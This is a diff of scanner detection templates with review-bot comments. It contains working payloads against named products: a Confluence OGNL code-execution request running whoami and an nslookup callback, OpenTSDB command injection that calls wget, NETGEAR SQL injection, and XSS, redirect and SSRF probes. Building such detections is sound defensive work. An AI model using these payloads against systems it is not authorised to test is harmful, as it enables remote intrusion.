@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json" - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status


@ -22,10 +22,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -3,7 +3,7 @@ id: CVE-2021-20090
info: info:
name: Buffalo WSR-2533DHPL2 - Path Traversal name: Buffalo WSR-2533DHPL2 - Path Traversal
author: gy741 author: gy741
severity: high severity: critical
description: | description: |
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces. Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
reference: reference:
@ -11,8 +11,8 @@ info:
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - https://nvd.nist.gov/vuln/detail/CVE-2021-20090
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.6 cvss-score: 9.8
cve-id: CVE-2021-20090 cve-id: CVE-2021-20090
cwe-id: CWE-22 cwe-id: CWE-22
tags: cve,cve2021,lfi,buffalo,firmware,iot,cisa tags: cve,cve2021,lfi,buffalo,firmware,iot,cisa
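Review bot: The severity is raised to critical with a CVSS:3.1 vector asserting high integrity and availability impact, but the description two lines below `severity` still describes only an authentication bypass, which is what the previous C:H/I:N/A:N vector expressed. If the re-score follows NVD, the vector should be copied from the NVD reference already listed and the description extended to say what the bypass leads to; otherwise the score and the description should be brought back into agreement. A reader comparing the two has no way to tell which one is authoritative.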


@ -21,7 +21,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/adminer?elastic=example.com&username=" - "{{BaseURL}}/adminer?elastic=interact.sh&username="
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -28,7 +28,7 @@ requests:
"user_login":"{{randstr}}", "user_login":"{{randstr}}",
"password":"{{randstr}}", "password":"{{randstr}}",
"user_name":"{{randstr}}", "user_name":"{{randstr}}",
"user_email":"{{randstr}}@example.com" "user_email":"{{randstr}}@interact.sh"
} }
matchers-condition: and matchers-condition: and


@ -23,7 +23,7 @@ requests:
- | - |
GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1 GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Referer: http://evil.com/127.0.0.1.html Referer: http://interact.sh/127.0.0.1.html
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -31,4 +31,4 @@ requests:
- type: word - type: word
words: words:
- "<title>Example Domain</title>" - "<h1> Interactsh Server </h1>"
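Review bot: Matching the body string `<h1> Interactsh Server </h1>` ties the verdict to the live HTML served by the public interact.sh host, so the template silently stops matching whenever that page changes, and it only works when the scanner follows the redirect off-target (presumably `redirects: true`, as the lg.php template further down sets). Checking the `Location` header for `interact.sh`, as the other redirect templates in this commit do, keeps the verdict local and deterministic; the same body matcher appears in the lg.php hunk below. The request block this matcher belongs to starts outside the hunk.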


@ -20,12 +20,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"
stop-at-first-match: true stop-at-first-match: true
redirects: true redirects: true
@ -37,5 +37,5 @@ requests:
- 200 - 200
- type: word - type: word
words: words:
- "<title>Example Domain</title>" - "<h1> Interactsh Server </h1>"
part: body part: body


@ -22,10 +22,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com" - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header


@ -18,10 +18,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym" - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header


@ -23,7 +23,7 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
- | - |
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1 GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
redirects: true redirects: true
@ -31,7 +31,7 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
extractors: extractors:
- type: regex - type: regex


@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/" - "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header
# Enhanced by mp on 2022/04/13 # Enhanced by mp on 2022/04/13


@ -19,14 +19,14 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com" - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status - type: status
status: status:


@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com" - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13 # Enhanced by mp on 2022/04/13


@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com" - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13 # Enhanced by mp on 2022/04/13


@ -18,12 +18,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com" - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/21 # Enhanced by mp on 2022/04/21


@ -17,10 +17,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com" - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -19,7 +19,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -32,7 +32,7 @@ requests:
words: words:
- "Content-Disposition: attachment;filename=test.txt" - "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test" - "Set-Cookie:CRLFInjection=Test"
- "Location: example.com" - "Location: interact.sh"
- "X-XSS-Protection:0" - "X-XSS-Protection:0"
part: header part: header
condition: and condition: and


@ -0,0 +1,33 @@
id: CVE-2021-27748
info:
name: IBM WebSphere Portal SSRF
author: pdteam
severity: high
description: |
A Server Side Request Forgery vulnerability affects HCL Digital Experience, on-premise deployments and containers.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
classification:
cve-id: CVE-2021-27748
tags: cve,cve2021,hcl,ibm,ssrf,websphere
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<h1> Interactsh Server </h1>"


@ -27,7 +27,7 @@ requests:
Connection: close Connection: close
- | - |
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1 GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept-Language: en Accept-Language: en
Connection: close Connection: close


@ -19,10 +19,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/new/newhttp://example.com" - "{{BaseURL}}/new/newhttp://interact.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header


@ -6,7 +6,7 @@ info:
severity: medium severity: medium
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
will pass FS's relative URL check however many browsers will gladly convert this to http://example.com. will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
reference: reference:
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
- https://github.com/Flask-Middleware/flask-security/issues/486 - https://github.com/Flask-Middleware/flask-security/issues/486
@ -21,10 +21,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/login?next=\\\example.com' - '{{BaseURL}}/login?next=\\\interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
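Review bot: The first hunk rewrites `http://example.com` inside the `description`, which appears to be explanatory text taken from the referenced GHSA advisory rather than a payload, so the template now misquotes its source; only the `next=` payload and the `Location` regex in the second hunk needed the interact.sh substitution, and the description should go back to the advisory's wording. While touching it, that description is an unquoted plain scalar continued over three lines — YAML folds it into one string today, but a future edit that introduces `: ` or ` #` breaks the file; `description: |` with the paragraph indented beneath it is the safer form. The `info` block starts before the first hunk.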


@ -20,7 +20,7 @@ info:
requests: requests:
- raw: - raw:
- |+ - |+
GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Connection: close Connection: close
@ -34,6 +34,6 @@ requests:
- type: word - type: word
words: words:
- "com\"/onmouseover=\"alert(1)\">" - "sh\"/onmouseover=\"alert(1)\">"
# Enhanced by mp on 2022/04/21 # Enhanced by mp on 2022/04/21


@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header


@ -34,11 +34,11 @@ requests:
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_email" Content-Disposition: form-data; name="reg_email"
{{randstr}}@example.com {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password" Content-Disposition: form-data; name="reg_password"
{{randstr}}@example.com {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password_present" Content-Disposition: form-data; name="reg_password_present"
@ -46,11 +46,11 @@ requests:
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_first_name" Content-Disposition: form-data; name="reg_first_name"
{{randstr}}@example.com {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_last_name" Content-Disposition: form-data; name="reg_last_name"
{{randstr}}@example.com {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="_wp_http_referer" Content-Disposition: form-data; name="_wp_http_referer"
@ -89,7 +89,7 @@ requests:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}} Referer: {{BaseURL}}
log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In
- | - |
GET /wp-admin/ HTTP/1.1 GET /wp-admin/ HTTP/1.1


@ -21,13 +21,13 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}//example.com/%2f..' - '{{BaseURL}}//interact.sh/%2f..'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header
- type: status - type: status


@ -20,12 +20,12 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com' - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# Enhanced by mp on 2022/03/16 # Enhanced by mp on 2022/03/16


@ -19,7 +19,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/auth/logout?continue=//example.com" - "{{BaseURL}}/auth/logout?continue=//interact.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -33,6 +33,6 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/27 # Enhanced by mp on 2022/02/27


@ -21,14 +21,14 @@ requests:
- | - |
GET / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
X-Forwarded-Host: //example.com X-Forwarded-Host: //interact.sh
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
- type: status - type: status
status: status:


@ -19,7 +19,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/lab.html?vpath=//example.com" - "{{BaseURL}}/lab.html?vpath=//interact.sh"
matchers: matchers:
- type: regex - type: regex


@ -22,10 +22,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1' - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -17,10 +17,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com" - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'


@ -20,12 +20,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/index.php/example.com' - '{{BaseURL}}/index.php/interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/03/08 # Enhanced by mp on 2022/03/08


@ -0,0 +1,44 @@
id: CVE-2022-26134
info:
name: Confluence - Remote Code Execution via OGNL template injection
author: pdteam,jbertman
severity: critical
description: |
Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center.
reference:
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- https://jira.atlassian.com/browse/CONFSERVER-79016
classification:
cve-id: CVE-2022-26134
metadata:
shodan-query: http.component:"Atlassian Confluence"
tags: cve,cve2022,confluence,rce,ognl,oast
requests:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
- "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"
stop-at-first-match: true
req-condition: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(to_lower(all_headers_1), "x-cmd-response:")'
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(to_lower(response_2), "confluence")'
condition: and
extractors:
- type: kval
part: header
kval:
- "x_cmd_response"


@ -0,0 +1,44 @@
id: CVE-2022-29383
info:
name: NETGEAR ProSafe SSL VPN firmware - SQL Injection
author: elitebaz
severity: critical
description: |
NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
reference:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
- https://nvd.nist.gov/vuln/detail/CVE-2022-29383
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29383
metadata:
verified: "true"
tags: cve,cve2022,sqli,netgear,router
requests:
- raw:
- |
POST /scgi-bin/platform.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
- |
POST /scgi-bin/platform.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_1, "User authentication Failed")
- contains(body_2, "User Login Failed for SSLVPN User.")
condition: and
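Review bot: The description says the injection point is at `cgi-bin/platform.cgi`, but both raw requests POST to `/scgi-bin/platform.cgi`; one of the two is wrong and the template only ever exercises the latter, so confirm the path against the referenced advisory and align the description with it. `verified: "true"` here (and in the CVE-2022-31268 template) is a quoted string while the other new templates in this commit use the bare boolean `verified: true`; pick one form so tooling that reads the field sees a consistent type.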


@ -0,0 +1,46 @@
id: CVE-2022-31268
info:
name: Gitblit 1.9.3 - Path traversal
author: 0x_Akoko
severity: high
description: |
A Path Traversal vulnerability in Gitblit 1.9.3 can lead to reading website files via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
reference:
